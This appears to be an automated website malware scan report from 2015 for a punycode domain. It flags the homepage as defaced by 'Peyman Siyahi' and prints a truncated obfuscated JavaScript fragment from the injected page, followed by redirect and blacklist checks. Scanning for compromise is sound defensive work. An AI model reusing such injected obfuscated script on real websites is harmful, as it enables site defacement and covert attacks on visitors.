Scanned pages/files
Request | Server response | Status |
http://xn--bten-qoa.org/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 18 Jul 2015 04:16:05 GMT Location: http://www.xn--bten-qoa.org/ Server: Apache Vary: Accept-Encoding Content-Length: 236 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.xn--bten-qoa.org/ | 200 OK Content-Length: 12993 Content-Type: text/html | suspicious |
Deface/Content modification. The following signature was found: Hacked By Peyman Siyahi <html>
<head> <meta content="Hacked By Peyman Siyahi" name="subject"> <meta content="Hacked By Peyman Siyahi" name="Abstract"> <meta content="Hacked By Peyman Siyahi" name="description"> <SCRIPT> var x = "_=(\"Y}RrO[c%8Cm%91%5Cp%86%89%87%90Y}bbJVj%91%89p%91Hm%91XS%87" + "%91Y%5Cp%86%89%91z%89dwwqQ^]b%8Aw%91V_v%91]%89%8EV_Q%91%89d^%85qQ_^Q%8" + "7%91Y}J_^%8EVjSbb%87%90Y}bbJVj%91Hm%91XS%87%91Y%5Cp%86%89%91z%89dwwqQ^" + " ...[13236 bytes skipped]... | ||
http://www.xn--bten-qoa.org/test404page.js | 404 Not Found Content-Length: 7746 Content-Type: text/html | clean |
http://www.xn--bten-qoa.org/wp-includes/js/jquery/jquery.js?ver=1.11.2 | 200 OK Content-Length: 95952 Content-Type: application/javascript | clean |
http://www.xn--bten-qoa.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.xn--bten-qoa.org/wp-content/themes/AffiliateTheme/js/library.js | 200 OK Content-Length: 2175 Content-Type: application/javascript | clean |
http://www.xn--bten-qoa.org/wp-content/themes/AffiliateTheme/js/jquery.corner.js | 200 OK Content-Length: 10048 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xn--bten-qoa.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 18 Jul 2015 04:16:05 GMT
Location: http://www.xn--bten-qoa.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
GET / HTTP/1.1
Host: xn--bten-qoa.org
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 18 Jul 2015 04:16:05 GMT
Location: http://www.xn--bten-qoa.org/
Server: Apache
Vary: Accept-Encoding
Content-Length: 236
Content-Type: text/html; charset=iso-8859-1
...236 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: xn--bten-qoa.org
Referer: http://www.google.com/search?q=xn--bten-qoa.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xn--bten-qoa.org
Referer: http://www.google.com/search?q=xn--bten-qoa.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xn--bten-qoa.org
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://xn--bten-qoa.org/
Result: xn--bten-qoa.org is not infected or malware details are not published yet.
Result: xn--bten-qoa.org is not infected or malware details are not published yet.